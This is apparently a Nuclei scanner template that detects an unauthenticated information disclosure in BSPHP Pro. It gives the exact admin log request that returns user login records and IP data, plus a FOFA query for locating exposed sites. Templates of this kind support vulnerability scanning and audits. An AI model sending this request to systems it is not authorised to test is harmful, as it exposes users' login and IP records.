id: bsphp-info

info:
  name: BSPHP - Information Disclosure
  author: ritikchaddha
  severity: low
  description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
    - https://github.com/bigblackhat/oFx/blob/main/poc/BSPHP/Info_Disclosure/poc.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="BSPHP"
  tags: BSPHP

http:
  - method: GET
    path:
      - '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"data":'
          - '"id"'
          - '"user"'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

# digest: 4a0a004730450220033c5256d9f095151dcc179c9e313d7a1a7d6990a474993090e051058fed29980221008ab4209bba10c0fcf2b914bb58c0fae56f45e3b5330d5e9fc9d620485c4dba7d:922c64590222798bb761d5b6d8e72950
